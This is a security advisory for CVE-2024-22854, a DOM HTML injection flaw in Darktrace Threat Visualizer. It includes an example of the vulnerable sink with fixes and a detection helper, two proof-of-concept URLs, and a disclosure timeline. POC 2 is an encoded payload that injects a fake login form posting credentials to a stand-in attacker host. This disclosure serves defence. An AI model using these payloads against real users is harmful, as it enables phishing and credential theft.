CVE-2024-22854

DOM HTML injection vulnerability in Darktrace Threat Visualizer due to incorrectly handled window.location.hash

A DOM-based HTML injection vulnerability has been identified in the main page of Darktrace Threat Visualizer <= 6.1.27 (bundle version 61050). A URL crafted by a remote attacker and visited by an authenticated user allows an open redirect and potential credential theft via an injected HTML form.

Description

A DOM-based HTML injection vulnerability has been identified in Darktrace Threat Visualizer <= 6.1.27 (bundle version: 61050). The vulnerability affects the main page of Threat Visualizer and is caused by a lack of proper validation and encoding of the window.location.hash value on multiple routes:

Unfiltered values are injected in multiple places in the generated HTML code.

To exploit the vulnerability, an attacker-crafted link must be opened by an authenticated user. The impact is limited by the Content Security Policy in place; nevertheless, some attack scenarios that pose a threat to users remain possible. The CSP header prevents loading resources from external origins and executing injected JavaScript (XSS), but it does not protect against manipulation of the page achieved by inserting HTML tags and CSS.
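The following is an added example, not code from Darktrace Threat Visualizer, that models the bug class described above: a value taken from window.location.hash reaches an HTML sink without encoding, beside an encoded and a validated version of the same sink. The route names "ip" and "uid" come from this advisory's payloads; the rendered element, the decoding step, the per-route validators and the log-review helper are assumptions made for illustration.

```javascript
// Added example, not code from Darktrace Threat Visualizer. It models the bug
// class in this advisory: a value taken from window.location.hash reaches an
// HTML sink without encoding. The route names "ip" and "uid" come from the
// advisory's payloads; the rendered element, the decoding step and the
// per-route validators are assumptions made for illustration.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode every character that can change HTML or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Split "#route/value" the way a hash-based router would. location.hash is
// delivered percent-encoded; the decode step here stands in for the
// application's own decoding (assumption). A malformed sequence is reported
// rather than thrown so callers can reject it.
function parseHash(hash) {
  const body = hash.startsWith("#") ? hash.slice(1) : hash;
  const slash = body.indexOf("/");
  const route = slash < 0 ? body : body.slice(0, slash);
  const raw = slash < 0 ? "" : body.slice(slash + 1);
  try {
    return { route, value: decodeURIComponent(raw), malformed: false };
  } catch (e) {
    return { route, value: "", malformed: true };
  }
}

// Vulnerable sink: the value is concatenated into an attribute, so a value
// beginning with '">' closes the attribute and the rest becomes markup.
// CSP blocks an injected <script>, but not <meta http-equiv="refresh">,
// <style> or a <form> pointing elsewhere, which is what the POCs rely on.
function renderVulnerable(hash) {
  const { value } = parseHash(hash);
  return `<input id="search" value="${value}">`;
}

// Fix 1: encode at the sink. The attacker's text is still shown, but only
// as text; no new element or attribute can be created from it.
function renderEncoded(hash) {
  const { value } = parseHash(hash);
  return `<input id="search" value="${escapeHtml(value)}">`;
}

// Fix 2 (defence in depth): validate per route before the value is used at
// all. Unknown routes, malformed encoding and values that do not match the
// route's expected shape are rejected. IPv4 only, for brevity.
const ROUTE_VALIDATORS = {
  ip: (v) => /^(\d{1,3}\.){3}\d{1,3}$/.test(v),
  uid: (v) => /^[A-Za-z0-9_.-]{1,64}$/.test(v),
};

function renderValidated(hash) {
  const { route, value, malformed } = parseHash(hash);
  const accept = ROUTE_VALIDATORS[route];
  if (malformed || !accept || !accept(value)) return null;
  return `<input id="search" value="${escapeHtml(value)}">`;
}

// Log-review helper: true when a fragment decodes to something containing
// markup delimiters, which a legitimate ip/uid value never does.
function fragmentLooksInjected(hash) {
  const { value, malformed } = parseHash(hash);
  return malformed || /[<>"']/.test(value);
}

// POC 1 fragment from this advisory (the host part is omitted).
const POC1_HASH =
  "#ip/%22%3E%3Cmeta%20http-equiv='refresh'%20content='0;https:%2F%2Fyoutu.be%2FdQw4w9WgXcQ'%3E";

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderVulnerable(POC1_HASH)); // a <meta> refresh appears in the markup
  console.log(renderEncoded(POC1_HASH)); // same text, now inert
  console.log(renderValidated(POC1_HASH)); // null: rejected before rendering
  console.log(renderValidated("#ip/10.0.0.1")); // a benign value renders normally
}
```

Encoding at the sink is the actual fix; validation per route is the second layer. On the CSP side, a `form-action` directive would additionally restrict where an injected form could submit, but no CSP directive stops a `<meta http-equiv="refresh">` redirect, which is consistent with the advisory's observation that CSP limited but did not prevent these scenarios.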

Example attack scenarios:

POC 1: Open redirect

By injecting a meta tag, it is possible to redirect an authenticated user to any website controlled by the attacker.

Payload: https://[darktrace]/#ip/%22%3E%3Cmeta%20http-equiv='refresh'%20content='0;https:%2F%2Fyoutu.be%2FdQw4w9WgXcQ'%3E

After an authenticated user visits the URL, they will be redirected to https://youtu.be/dQw4w9WgXcQ

POC 2: Credential stealing via fake login form

By injecting HTML code and CSS styles, it is possible to insert a login form into the page that looks identical to the Darktrace sign-in form. After the injected form is submitted, the entered credentials are sent via a POST request to a website controlled by the attacker.

Payload: https://[darktrace]/#uid/%22%3E%3Clink%20rel%3D%27stylesheet%27%20href%3D%27%2Fsabre%2Dweb%2Flogin%2Flogin%2Ecss%27%3E%3Cstyle%3E%23threat%2Dlog%2Dwrapper%7Bdisplay%3Anone%7D%23x%7Bposition%3Afixed%3Btop%3A0%3Bleft%3A0%3Bbackground%3Argb%288%2C10%2C13%29%3Bheight%3A100%25%3Bwidth%3A100%25%3Bz%2Dindex%3A100000%3Bdisplay%3Aflex%3Bjustify%2Dcontent%3Acenter%3Balign%2Ditems%3Acenter%7D%3C%2Fstyle%3E%3Cdiv%20id%3D%27x%27%20class%3D%27login%27%3E%3Cdiv%20class%3D%27login%5F%5Fcard%20login%5F%5Fcard%2D%2Dvisible%27%20role%3D%27main%27%20aria%2Dlabelledby%3D%27threat%2Dversion%27%3E%3Cimg%20src%3D%27%2Fdt%2Dassets%2Flogo%2FSVG%2Fdt%2Dlogo%2Dwhite%2Esvg%27%20alt%3D%27Darktrace%20login%27%3E%3Ch4%20class%3D%27login%5F%5Fversion%27%3EThreat%20Visualizer%206%2E1%3C%2Fh4%3E%3Cdiv%20class%3D%27login%5F%5Fcontents%27%3E%3Cform%20class%3D%27login%5F%5Fform%27%20id%3D%27account%2Dform%27%20action%3D%27https%3A%2F%2Fattacker%27%20method%3D%27post%27%3E%3Cdiv%20class%3D%27dt%2Dinput%2Dvalidate%20user%27%3E%3Cinput%20class%3D%27dt%2Dinput%27%20id%3D%27username%27%20spellcheck%3D%27false%27%20aria%2Dlabel%3D%27Username%27%20name%3D%27username%27%20type%3D%27text%27%20placeholder%3D%27Username%27%20required%3D%27%27%3E%3Clabel%20class%3D%27dt%2Dinput%5F%5Flabel%27%3EPlease%20enter%20your%20username%3C%2Flabel%3E%3Cspan%20class%3D%27dt%2Dinput%5F%5Findicator%27%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20class%3D%27dt%2Dinput%2Dvalidate%27%3E%3Cinput%20class%3D%27dt%2Dinput%27%20id%3D%27password%27%20aria%2Dlabel%3D%27Password%27%20name%3D%27password%27%20type%3D%27password%27%20placeholder%3D%27Password%27%20autocomplete%3D%27off%27%20required%3D%27%27%3E%3Clabel%20class%3D%27dt%2Dinput%5F%5Flabel%27%3EPlease%20enter%20your%20password%3C%2Flabel%3E%3Cinput%20id%3D%27location%27%20name%3D%27next%27%20type%3D%27hidden%27%20value%3D%27%27%3E%3Cspan%20class%3D%27dt%2Dinput%5F%5Findicator%27%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3Cdiv%20id%3D%27error%2Dcontainer%27%3E%3Cdiv%20class%3D%27dt%2Dtoast%20dt%2Dtoast%2D%2Dwarning%20dt%2Dtoast%2D%2Dhidden%27%20id%3D%27caps%2Dlock%2Dwarning%27%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cinput%20class%3D%27dt%2Dbutton%27%20id%3D%27login%2Dbtn%27%20type%3D%27submit%27%20value%3D%27Log%20In%27%3E%3C%2Fform%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

After an authenticated user visits the URL, a fake login form will be shown.

[Screenshot: Injected form]

Timeline

17.12.2023 08:49 CET
Vulnerability reported in accordance with the vulnerability disclosure policy of Darktrace.
27.12.2023 13:14 CET
E-mail sent to Darktrace requesting confirmation of receipt of the report.
02.01.2024 14:44 CET
Response from Darktrace received – vulnerability confirmed and fix included in 6.1.28 (bundle 61051).
04.01.2024 16:10 CET
Fix tested in 6.1.28 (bundle 61051), mitigation confirmed. Additional suggestions regarding possible improvements have been provided.